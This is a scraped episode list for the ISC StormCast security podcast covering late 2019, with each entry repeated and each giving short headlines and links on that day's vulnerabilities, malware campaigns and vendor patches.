Slack "Unshare" Not Working As Expected https://www.theregister.co.uk/2019/12/16/slack_filesharing_vulnerability_post_sharing/ Google Making OAUTH Mandatory for GSuite https://gsuiteupdates.googleblog.com/2019/12/less-secure-apps-oauth-google-username-password-incorrect.html TPLink Authentication Bypass https://securityintelligence.com/posts/tp-link-archer-router-vulnerability-voids-admin-password-can-allow-remote-takeover/ Factoring IoT RSA Keys https://info.keyfactor.com/factoring-rsa-keys-in-the-iot-era
12/17/20196 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, December 17th 2019

Slack "Unshare" Not Working As Expected https://www.theregister.co.uk/2019/12/16/slack_filesharing_vulnerability_post_sharing/ Google Making OAUTH Mandatory for GSuite https://gsuiteupdates.googleblog.com/2019/12/less-secure-apps-oauth-google-username-password-incorrect.html TPLink Authentication Bypass https://securityintelligence.com/posts/tp-link-archer-router-vulnerability-voids-admin-password-can-allow-remote-takeover/ Factoring IoT RSA Keys https://info.keyfactor.com/factoring-rsa-keys-in-the-iot-era
12/17/20196 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, December 16th 2019

VBA Macros in Autocad https://isc.sans.edu/forums/diary/Malicious+DWG+Files/25612/ OpenBSD Privilege Escalation Vulnerability https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt NPM Fixes Critical Security Vulnerability https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli
12/16/20195 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, December 16th 2019

VBA Macros in Autocad https://isc.sans.edu/forums/diary/Malicious+DWG+Files/25612/ OpenBSD Privilege Escalation Vulnerability https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt NPM Fixes Critical Security Vulnerability https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli
12/16/20195 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, December 13th 2019

Malware Information Sharing https://isc.sans.edu/forums/diary/Code+Data+Reuse+in+the+Malware+Ecosystem/25598/ Apple Improves Tracking Prevention Tracking in WebKit https://webkit.org/blog/9661/preventing-tracking-prevention-tracking/ Google Verified SMS Messages https://www.blog.google/products/messages/safer-conversations-messages-verified-sms-and-spam-protection/ Echobot Keeps Adding More Exploits https://www.bleepingcomputer.com/news/security/new-echobot-variant-exploits-77-remote-code-execution-flaws/ STI Research Paper: Caleb Baker DNS Monitoring https://www.sans.org/reading-room/whitepapers/dns/challenges-effective-dns-query-monitoring-39215
12/13/201914 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, December 13th 2019

Malware Information Sharing https://isc.sans.edu/forums/diary/Code+Data+Reuse+in+the+Malware+Ecosystem/25598/ Apple Improves Tracking Prevention Tracking in WebKit https://webkit.org/blog/9661/preventing-tracking-prevention-tracking/ Google Verified SMS Messages https://www.blog.google/products/messages/safer-conversations-messages-verified-sms-and-spam-protection/ Echobot Keeps Adding More Exploits https://www.bleepingcomputer.com/news/security/new-echobot-variant-exploits-77-remote-code-execution-flaws/ STI Research Paper: Caleb Baker DNS Monitoring https://www.sans.org/reading-room/whitepapers/dns/challenges-effective-dns-query-monitoring-39215
12/13/201914 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, December 12th 2019

German Malspam Installs Trickbot https://isc.sans.edu/forums/diary/German+language+malspam+pushes+yet+another+wave+of+Trickbot/25594/ Vulnerable KeyWe Smart Lock https://labs.f-secure.com/advisories/keywe-smart-lock-unauthorized-access-traffic-interception Google Chrome Update https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html iOS Spam Feature https://support.apple.com/en-us/HT210756 https://kishanbagaria.com/airdos/
12/12/20195 minutes, 17 seconds
Episode Artwork

ISC StormCast for Thursday, December 12th 2019

German Malspam Installs Trickbot https://isc.sans.edu/forums/diary/German+language+malspam+pushes+yet+another+wave+of+Trickbot/25594/ Vulnerable KeyWe Smart Lock https://labs.f-secure.com/advisories/keywe-smart-lock-unauthorized-access-traffic-interception Google Chrome Update https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html iOS Spam Feature https://support.apple.com/en-us/HT210756 https://kishanbagaria.com/airdos/
12/12/20195 minutes, 17 seconds
Episode Artwork

ISC StormCast for Wednesday, December 11th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+December+2019+Patch+Tuesday/25592/ https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/ Adobe Patch Tuesday https://helpx.adobe.com/security.html Apple Security Updates https://support.apple.com/en-us/HT201222 Intel Plundervolt Update https://blogs.intel.com/technology/2019/12/ipas-security-advisories-for-december-2019/
12/11/20196 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, December 11th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+December+2019+Patch+Tuesday/25592/ https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/ Adobe Patch Tuesday https://helpx.adobe.com/security.html Apple Security Updates https://support.apple.com/en-us/HT201222 Intel Plundervolt Update https://blogs.intel.com/technology/2019/12/ipas-security-advisories-for-december-2019/
12/11/20196 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, December 10th 2019

Another Word Maldoc https://isc.sans.edu/forums/diary/Lazy+Sunday+Maldoc+Analysis/25586/ Snatch Ransomware Reboots System Into Safe Mode To Disable Anti Virus https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ Ryuk Ransomware Decryptor May No Longer Work / Corrupt Documents https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/ Extending Windows 7 Security Updates https://www.ghacks.net/2019/12/07/someone-found-a-way-to-bypass-windows-7-extended-security-updates-checks/ Swift on Security Updates Sysmon Rules https://github.com/SwiftOnSecurity/sysmon-config RSA Webcast https://www.rsaconference.com/industry-topics/webcast/36-five-most-dangerous-attacks-evolving
12/10/20197 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, December 10th 2019

Another Word Maldoc https://isc.sans.edu/forums/diary/Lazy+Sunday+Maldoc+Analysis/25586/ Snatch Ransomware Reboots System Into Safe Mode To Disable Anti Virus https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ Ryuk Ransomware Decryptor May No Longer Work / Corrupt Documents https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/ Extending Windows 7 Security Updates https://www.ghacks.net/2019/12/07/someone-found-a-way-to-bypass-windows-7-extended-security-updates-checks/ Swift on Security Updates Sysmon Rules https://github.com/SwiftOnSecurity/sysmon-config RSA Webcast https://www.rsaconference.com/industry-topics/webcast/36-five-most-dangerous-attacks-evolving
12/10/20197 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, December 9th 2019

E-Mail Includes Entire HTML/Javascript Phishing Kit https://isc.sans.edu/forums/diary/Phishing+with+a+selfcontained+credentialsstealing+webpage/25580/ Great Canon / Red Canon Activated to Silence Pro Hongkong Forum https://cybersecurity.att.com/blogs/labs-research/the-great-cannon-has-been-deployed-again
12/9/20196 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, December 9th 2019

E-Mail Includes Entire HTML/Javascript Phishing Kit https://isc.sans.edu/forums/diary/Phishing+with+a+selfcontained+credentialsstealing+webpage/25580/ Great Canon / Red Canon Activated to Silence Pro Hongkong Forum https://cybersecurity.att.com/blogs/labs-research/the-great-cannon-has-been-deployed-again
12/9/20196 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, December 6th 2019

OpenBSD Authentication Bypass and Privilege Escalation Vulnerability https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt?_ga=2.58244398.587934852.1575530822-682141427.1570559125 Hijacking Linux (and BSD) VPN Connections https://seclists.org/oss-sec/2019/q4/122 RASP vs. WAF: Alexander Fry Research Paper https://www.sans.org/reading-room/whitepapers/application/runtime-application-self-protection-rasp-investigation-effectiveness-rasp-solution-protecting-vulnerable-target-applications-38950
12/6/201914 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, December 6th 2019

OpenBSD Authentication Bypass and Privilege Escalation Vulnerability https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt?_ga=2.58244398.587934852.1575530822-682141427.1570559125 Hijacking Linux (and BSD) VPN Connections https://seclists.org/oss-sec/2019/q4/122 RASP vs. WAF: Alexander Fry Research Paper https://www.sans.org/reading-room/whitepapers/application/runtime-application-self-protection-rasp-investigation-effectiveness-rasp-solution-protecting-vulnerable-target-applications-38950
12/6/201914 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, December 5th 2019

Atlasian Companion App / IBM Aspera Cloud https://www.theregister.co.uk/2019/12/05/atlassian_zero_day_bug/ https://confluence.atlassian.com/doc/administering-the-atlassian-companion-app-958456281.html https://twitter.com/tmslft/status/1202056063878606848?s=20 Fake Python Library in PyPi https://github.com/dateutil/dateutil/issues/984 GoAhead Web Server Vulnerability https://talosintelligence.com/vulnerability_reports/TALOS-2019-0888
12/5/20196 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, December 5th 2019

Atlasian Companion App / IBM Aspera Cloud https://www.theregister.co.uk/2019/12/05/atlassian_zero_day_bug/ https://confluence.atlassian.com/doc/administering-the-atlassian-companion-app-958456281.html https://twitter.com/tmslft/status/1202056063878606848?s=20 Fake Python Library in PyPi https://github.com/dateutil/dateutil/issues/984 GoAhead Web Server Vulnerability https://talosintelligence.com/vulnerability_reports/TALOS-2019-0888
12/5/20196 minutes, 1 second
Episode Artwork

ISC StormCast for Wednesday, December 4th 2019

Avast Online Security and Avast Secure Browser Blocked for Spying on Users https://palant.de/2019/10/28/avast-online-security-and-avast-secure-browser-are-spying-on-you/ Google Android Updates https://source.android.com/security/bulletin/2019-12-01 Strandhogg Vulnerability https://promon.co/security-news/strandhogg/ Firefox 71 Released https://www.mozilla.org/en-US/security/advisories/mfsa2019-34/
12/4/20196 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, December 4th 2019

Avast Online Security and Avast Secure Browser Blocked for Spying on Users https://palant.de/2019/10/28/avast-online-security-and-avast-secure-browser-are-spying-on-you/ Google Android Updates https://source.android.com/security/bulletin/2019-12-01 Strandhogg Vulnerability https://promon.co/security-news/strandhogg/ Firefox 71 Released https://www.mozilla.org/en-US/security/advisories/mfsa2019-34/
12/4/20196 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, December 3rd 2019

Increased Scans on Port 26 https://isc.sans.edu/forums/diary/Next+up+whats+up+with+TCP+port+26/25564/ Recent Ursnif Malspam https://isc.sans.edu/forums/diary/Ursnif+infection+with+Dridex/25566/ Windows 7 Extended Security Updates https://www.microsoft.com/microsoft-365/partners/news/article/announcing-paid-windows-7-extended-security-updates QNAP Patches Photo Station https://www.qnap.com/en/security-advisory/nas-201911-25
12/3/20195 minutes, 53 seconds
Episode Artwork

ISC StormCast for Tuesday, December 3rd 2019

Increased Scans on Port 26 https://isc.sans.edu/forums/diary/Next+up+whats+up+with+TCP+port+26/25564/ Recent Ursnif Malspam https://isc.sans.edu/forums/diary/Ursnif+infection+with+Dridex/25566/ Windows 7 Extended Security Updates https://www.microsoft.com/microsoft-365/partners/news/article/announcing-paid-windows-7-extended-security-updates QNAP Patches Photo Station https://www.qnap.com/en/security-advisory/nas-201911-25
12/3/20195 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, December 2nd 2019

Agent Tesla Malware Sample Analysis https://isc.sans.edu/forums/diary/Finding+an+Agent+Tesla+malware+sample/25554/ Search With SauronEye https://isc.sans.edu/forums/diary/ISC+Snapshot+Search+with+SauronEye/25558/ Splunk Y2K20 Patch https://docs.splunk.com/Documentation/Splunk/8.0.0/ReleaseNotes/FixDatetimexml2020 Google TAG Quarterly Summary https://blog.google/technology/safety-security/threat-analysis-group/protecting-users-government-backed-hacking-and-disinformation/
12/2/20196 minutes, 43 seconds
Episode Artwork

ISC StormCast for Monday, December 2nd 2019

Agent Tesla Malware Sample Analysis https://isc.sans.edu/forums/diary/Finding+an+Agent+Tesla+malware+sample/25554/ Search With SauronEye https://isc.sans.edu/forums/diary/ISC+Snapshot+Search+with+SauronEye/25558/ Splunk Y2K20 Patch https://docs.splunk.com/Documentation/Splunk/8.0.0/ReleaseNotes/FixDatetimexml2020 Google TAG Quarterly Summary https://blog.google/technology/safety-security/threat-analysis-group/protecting-users-government-backed-hacking-and-disinformation/
12/2/20196 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, November 27th 2019

Playing With Phishing https://isc.sans.edu/forums/diary/Lessons+learned+from+playing+a+willing+phish/25552/ HPE SSD Drives will Stop Working in 3 years https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00092491en_us Malicious Android SDK Captures Social Media Data https://help.twitter.com/en/sdk-issue Kasperski API Exposed to Websites https://palant.de/2019/11/26/internal-kaspersky-api-exposed-to-websites/ Malicious Ad Statistics https://www.confiant.com/Demand-Quality-Report-Q3-2019
11/27/20195 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, November 27th 2019

Playing With Phishing https://isc.sans.edu/forums/diary/Lessons+learned+from+playing+a+willing+phish/25552/ HPE SSD Drives will Stop Working in 3 years https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00092491en_us Malicious Android SDK Captures Social Media Data https://help.twitter.com/en/sdk-issue Kasperski API Exposed to Websites https://palant.de/2019/11/26/internal-kaspersky-api-exposed-to-websites/ Malicious Ad Statistics https://www.confiant.com/Demand-Quality-Report-Q3-2019
11/27/20195 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, November 26th 2019

DNS over HTTPS (DoH) in SOHO Networks https://isc.sans.edu/forums/diary/My+Little+DoH+Setup/25548/ Fortinet Weak Crypto https://sec-consult.com/en/blog/advisories/weak-encryption-cipher-and-hardcoded-cryptographic-keys-in-fortinet-products/ Tracking Web Users via DNS https://github.com/uBlockOrigin/uBlock-issues/issues/780
11/26/20194 minutes, 38 seconds
Episode Artwork

ISC StormCast for Tuesday, November 26th 2019

DNS over HTTPS (DoH) in SOHO Networks https://isc.sans.edu/forums/diary/My+Little+DoH+Setup/25548/ Fortinet Weak Crypto https://sec-consult.com/en/blog/advisories/weak-encryption-cipher-and-hardcoded-cryptographic-keys-in-fortinet-products/ Tracking Web Users via DNS https://github.com/uBlockOrigin/uBlock-issues/issues/780
11/26/20194 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, November 25th 2019

Web Filter Misconfiguration Abused for Recognisance https://isc.sans.edu/forums/diary/Abusing+Web+Filters+Misconfiguration+for+Reconnaissance/25538/ Local Malware Analysis with Malice https://isc.sans.edu/forums/diary/Local+Malware+Analysis+with+Malice/25544/ Multiple Vulnerabilities in VNC https://www.kaspersky.com/blog/vnc-vulnerabilities/31462/
11/25/20195 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, November 25th 2019

Web Filter Misconfiguration Abused for Recognisance https://isc.sans.edu/forums/diary/Abusing+Web+Filters+Misconfiguration+for+Reconnaissance/25538/ Local Malware Analysis with Malice https://isc.sans.edu/forums/diary/Local+Malware+Analysis+with+Malice/25544/ Multiple Vulnerabilities in VNC https://www.kaspersky.com/blog/vnc-vulnerabilities/31462/
11/25/20195 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, November 22nd 2019

Weaknesses in Memory Encryption Solutions https://arxiv.org/abs/1908.11680 GetMonero Wallet Compromised https://web.getmonero.org/2019/11/19/warning-compromised-binaries.html RIPlace Ransomware Detection Bypass https://www.nyotron.com/blog/nyotron-discovers-potentially-unstoppable-ransomware-evasion-technique-riplace/ Microsoft Office Remote Content Triggers in Preview Pane https://medium.com/@curtbraz/getting-malicious-office-documents-to-fire-with-protected-view-4de18668c386
11/22/20196 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, November 22nd 2019

Weaknesses in Memory Encryption Solutions https://arxiv.org/abs/1908.11680 GetMonero Wallet Compromised https://web.getmonero.org/2019/11/19/warning-compromised-binaries.html RIPlace Ransomware Detection Bypass https://www.nyotron.com/blog/nyotron-discovers-potentially-unstoppable-ransomware-evasion-technique-riplace/ Microsoft Office Remote Content Triggers in Preview Pane https://medium.com/@curtbraz/getting-malicious-office-documents-to-fire-with-protected-view-4de18668c386
11/22/20196 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, November 21st 2019

Latest Hancitor Malspam Update https://isc.sans.edu/forums/diary/Hancitor+infection+with+Pony+Evil+Pony+Ursnif+and+Cobalt+Strike/25532/ Oracle Payday Vulnerabilities Exploited https://www.onapsis.com/blog/oracle-payday-vulnerabilities Google Chrome Update https://chromereleases.googleblog.com/2019/11/stable-channel-update-for-desktop_18.html NSA Publishes Guide About the Risks of Inspecting TLS https://media.defense.gov/2019/Nov/18/2002212783/-1/-1/0/MANAGING%20RISK%20FROM%20TLS%20INSPECTION_20191106.PDF Unbound Command Execution Vulnerability https://nlnetlabs.nl/projects/unbound/security-advisories/#vulnerability-in-ipsec-module
11/21/20196 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, November 21st 2019

Latest Hancitor Malspam Update https://isc.sans.edu/forums/diary/Hancitor+infection+with+Pony+Evil+Pony+Ursnif+and+Cobalt+Strike/25532/ Oracle Payday Vulnerabilities Exploited https://www.onapsis.com/blog/oracle-payday-vulnerabilities Google Chrome Update https://chromereleases.googleblog.com/2019/11/stable-channel-update-for-desktop_18.html NSA Publishes Guide About the Risks of Inspecting TLS https://media.defense.gov/2019/Nov/18/2002212783/-1/-1/0/MANAGING%20RISK%20FROM%20TLS%20INSPECTION_20191106.PDF Unbound Command Execution Vulnerability https://nlnetlabs.nl/projects/unbound/security-advisories/#vulnerability-in-ipsec-module
11/21/20196 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, November 20th 2019

JAWS DVR Bot https://isc.sans.edu/forums/diary/Cheap+Chinese+JAWS+of+DVR+Exploitability+on+Port+60001/25530/ TianFu Cup https://twitter.com/TianfuCup Microsoft Access Hotfix https://support.microsoft.com/en-us/help/4484198/november-18-2019-update-for-office-2016-kb4484198 Windows 10 DNS over HTTPS https://techcommunity.microsoft.com/t5/Networking-Blog/Windows-will-improve-user-privacy-with-DNS-over-HTTPS/ba-p/1014229 Android Camera Permission Mixup https://www.checkmarx.com/blog/how-attackers-could-hijack-your-android-camera
11/20/20196 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, November 20th 2019

JAWS DVR Bot https://isc.sans.edu/forums/diary/Cheap+Chinese+JAWS+of+DVR+Exploitability+on+Port+60001/25530/ TianFu Cup https://twitter.com/TianfuCup Microsoft Access Hotfix https://support.microsoft.com/en-us/help/4484198/november-18-2019-update-for-office-2016-kb4484198 Windows 10 DNS over HTTPS https://techcommunity.microsoft.com/t5/Networking-Blog/Windows-will-improve-user-privacy-with-DNS-over-HTTPS/ba-p/1014229 Android Camera Permission Mixup https://www.checkmarx.com/blog/how-attackers-could-hijack-your-android-camera
11/20/20196 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, November 19th 2019

Carriers Filter SMS Messages Sent By Applications https://isc.sans.edu/forums/diary/SMS+and+2FA+Another+Reason+to+Move+away+from+It/25526/ Intel Removing BIOS Downloads for EOL Hardware https://www.vogons.org/viewtopic.php?f=46&t=69184 https://news.ycombinator.com/item?id=21563309 Outlook 365 Remains Top Phishing Target https://info.phishlabs.com/blog/active-office-365-phishing-campaign-targeting-admin-credentials
11/19/20195 minutes, 38 seconds
Episode Artwork

ISC StormCast for Tuesday, November 19th 2019

Carriers Filter SMS Messages Sent By Applications https://isc.sans.edu/forums/diary/SMS+and+2FA+Another+Reason+to+Move+away+from+It/25526/ Intel Removing BIOS Downloads for EOL Hardware https://www.vogons.org/viewtopic.php?f=46&t=69184 https://news.ycombinator.com/item?id=21563309 Outlook 365 Remains Top Phishing Target https://info.phishlabs.com/blog/active-office-365-phishing-campaign-targeting-admin-credentials
11/19/20195 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, November 18th 2019

TPM Fail Update https://downloadcenter.intel.com/download/28632 https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00241.html Office November Update Issues https://borncity.com/win/2019/11/13/office-november-2019-updates-are-causing-access-error-3340/ WhatsApp Stack Based Buffer Overflow https://nvd.nist.gov/vuln/detail/CVE-2019-11931 Android Qualcom Data Exfiltration Bug https://research.checkpoint.com/the-road-to-qualcomm-trustzone-apps-fuzzing/ Nextcloud Ransomware NextCry https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/
11/18/20195 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, November 18th 2019

TPM Fail Update https://downloadcenter.intel.com/download/28632 https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00241.html Office November Update Issues https://borncity.com/win/2019/11/13/office-november-2019-updates-are-causing-access-error-3340/ WhatsApp Stack Based Buffer Overflow https://nvd.nist.gov/vuln/detail/CVE-2019-11931 Android Qualcom Data Exfiltration Bug https://research.checkpoint.com/the-road-to-qualcomm-trustzone-apps-fuzzing/ Nextcloud Ransomware NextCry https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/
11/18/20195 minutes, 55 seconds
Episode Artwork

ISC StormCast for Friday, November 15th 2019

LokiBot Update (November 2019) https://isc.sans.edu/forums/diary/An+example+of+malspam+pushing+Lokibot+malware+November+2019/25518/ Some Packet-Fu with Zeek https://isc.sans.edu/forums/diary/Some+packetfu+with+Zeek+previously+known+as+bro/25510/ TPM Leaks http://tpm.fail/ Zombieload 2.0 Vulnerability https://zombieloadattack.com/
11/15/20197 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, November 15th 2019

LokiBot Update (November 2019) https://isc.sans.edu/forums/diary/An+example+of+malspam+pushing+Lokibot+malware+November+2019/25518/ Some Packet-Fu with Zeek https://isc.sans.edu/forums/diary/Some+packetfu+with+Zeek+previously+known+as+bro/25510/ TPM Leaks http://tpm.fail/ Zombieload 2.0 Vulnerability https://zombieloadattack.com/
11/15/20197 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, November 13th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/November+2019+Microsoft+Patch+Tuesday/25516/ Adobe Update https://helpx.adobe.com/security.html Facebook Camera Bug https://www.cnet.com/news/facebook-bug-has-camera-activated-while-people-are-using-the-app McAfee Anti Virus Bypass and Persistance https://safebreach.com/Post/McAfee-All-Editions-MTP-AVP-MIS-Self-Defense-Bypass-and-Potential-Usages-CVE-2019-3648
11/13/20196 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, November 13th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/November+2019+Microsoft+Patch+Tuesday/25516/ Adobe Update https://helpx.adobe.com/security.html Facebook Camera Bug https://www.cnet.com/news/facebook-bug-has-camera-activated-while-people-are-using-the-app McAfee Anti Virus Bypass and Persistance https://safebreach.com/Post/McAfee-All-Editions-MTP-AVP-MIS-Self-Defense-Bypass-and-Potential-Usages-CVE-2019-3648
11/13/20196 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, November 12th 2019

Are We Going Back to TheMoon And How is Liquor Involved https://isc.sans.edu/forums/diary/Are+We+Going+Back+to+TheMoon+and+How+is+Liquor+Involved/25512/ New Update for Magento Shopping Cart https://magento.com/security/patches/latest-magento-security-update-helps-protect-recently-reported-rce-vulnerability https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update ZoneAlarm vBulletin Forum Breached https://thehackernews.com/2019/11/zonealarm-forum-data-breach.html CSS Injection in Slack to Log Keystrokes https://fletchto99.dev/2019/november/slack-vulnerability/
11/12/20195 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, November 12th 2019

Are We Going Back to TheMoon And How is Liquor Involved https://isc.sans.edu/forums/diary/Are+We+Going+Back+to+TheMoon+and+How+is+Liquor+Involved/25512/ New Update for Magento Shopping Cart https://magento.com/security/patches/latest-magento-security-update-helps-protect-recently-reported-rce-vulnerability https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update ZoneAlarm vBulletin Forum Breached https://thehackernews.com/2019/11/zonealarm-forum-data-breach.html CSS Injection in Slack to Log Keystrokes https://fletchto99.dev/2019/november/slack-vulnerability/
11/12/20195 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, November 11th 2019

Microsoft Applications Diverted from Their Main Use https://isc.sans.edu/forums/diary/Microsoft+Apps+Diverted+from+Their+Main+Use/25502/ Did Bluekeep Malware Afect Patching https://isc.sans.edu/forums/diary/Did+the+recent+malicious+BlueKeep+campaign+have+any+positive+impact+when+it+comes+to+patching/25506/ Pwn2Own Summary https://www.zerodayinitiative.com/blog/2019/11/7/pwn2own-tokyo-2019-day-two-final-results State of Javascript Framework Security https://snyk.io/wp-content/uploads/snyk-javascript_report_2019.pdf DShield/ISC Honeypot Update https://isc.sans.edu/honeypot.html
11/11/20196 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, November 11th 2019

Microsoft Applications Diverted from Their Main Use https://isc.sans.edu/forums/diary/Microsoft+Apps+Diverted+from+Their+Main+Use/25502/ Did Bluekeep Malware Afect Patching https://isc.sans.edu/forums/diary/Did+the+recent+malicious+BlueKeep+campaign+have+any+positive+impact+when+it+comes+to+patching/25506/ Pwn2Own Summary https://www.zerodayinitiative.com/blog/2019/11/7/pwn2own-tokyo-2019-day-two-final-results State of Javascript Framework Security https://snyk.io/wp-content/uploads/snyk-javascript_report_2019.pdf DShield/ISC Honeypot Update https://isc.sans.edu/honeypot.html
11/11/20196 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, November 8th 2019

Adobe Mobile SDK Update Fixes TLS Defaults https://wwws.nightwatchcybersecurity.com/2019/11/06/insecure-defaults-in-adobes-mobile-sdks/ QNAP Updates QSnatch Advisory https://www.qnap.com/en/security-advisory/nas-201911-01 Double Loaded ZIP Files Delivery Malware https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/double-loaded-zip-file-delivers-nanocore/ Ring Video Doorbell Leaks Wifi Password https://labs.bitdefender.com/2019/11/ring-video-doorbell-pro-under-the-scope/
11/8/20196 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, November 8th 2019

Adobe Mobile SDK Update Fixes TLS Defaults https://wwws.nightwatchcybersecurity.com/2019/11/06/insecure-defaults-in-adobes-mobile-sdks/ QNAP Updates QSnatch Advisory https://www.qnap.com/en/security-advisory/nas-201911-01 Double Loaded ZIP Files Delivery Malware https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/double-loaded-zip-file-delivers-nanocore/ Ring Video Doorbell Leaks Wifi Password https://labs.bitdefender.com/2019/11/ring-video-doorbell-pro-under-the-scope/
11/8/20196 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, November 7th 2019

Google Improving PlayStore Security With Partners https://security.googleblog.com/2019/11/the-app-defense-alliance-bringing.html Xen Security Advisories https://xenbits.xen.org/xsa/ npcap pool corruption vulnerability https://github.com/nmap/nmap/issues/1568 TrendMicro Employee Selling Customer Data to Tech Support Scammers https://blog.trendmicro.com/trend-micro-discloses-insider-threat-impacting-some-of-its-consumer-customers/ SANS Security Awareness Newsletter https://www.sans.org/security-awareness-training/resources/shopping-online-securely-1
11/7/20195 minutes, 19 seconds
Episode Artwork

ISC StormCast for Thursday, November 7th 2019

Google Improving PlayStore Security With Partners https://security.googleblog.com/2019/11/the-app-defense-alliance-bringing.html Xen Security Advisories https://xenbits.xen.org/xsa/ npcap pool corruption vulnerability https://github.com/nmap/nmap/issues/1568 TrendMicro Employee Selling Customer Data to Tech Support Scammers https://blog.trendmicro.com/trend-micro-discloses-insider-threat-impacting-some-of-its-consumer-customers/ SANS Security Awareness Newsletter https://www.sans.org/security-awareness-training/resources/shopping-online-securely-1
11/7/20195 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, November 6th 2019

Formbook Malspam https://isc.sans.edu/forums/diary/Malspam+pushing+Formbook+info+stealer/23387/ Honeypot Update https://github.com/DShield-ISC/dshield Office on Mac XLM Macros https://kb.cert.org/vuls/id/125336/ Firefox Browser Lock Bug Exploited https://bugzilla.mozilla.org/show_bug.cgi?id=1593795 libarchive use after free vulnerability https://medium.com/@social_62682/new-libarchive-use-after-free-vulnerability-36c4b141fe89
11/6/20196 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, November 6th 2019

Formbook Malspam https://isc.sans.edu/forums/diary/Malspam+pushing+Formbook+info+stealer/23387/ Honeypot Update https://github.com/DShield-ISC/dshield Office on Mac XLM Macros https://kb.cert.org/vuls/id/125336/ Firefox Browser Lock Bug Exploited https://bugzilla.mozilla.org/show_bug.cgi?id=1593795 libarchive use after free vulnerability https://medium.com/@social_62682/new-libarchive-use-after-free-vulnerability-36c4b141fe89
11/6/20196 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, November 5th 2019

Clam AV Vulnerability https://twitter.com/hackerfantastic/status/1190685521153937408 https://pastebin.com/cfP7X89m XCode Vulnerability https://support.apple.com/en-is/HT210729 MikroTik DNS Cache Poisoning https://blog.mikrotik.com/security/dns-cache-poisoning-vulnerability.html
11/5/20196 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, November 5th 2019

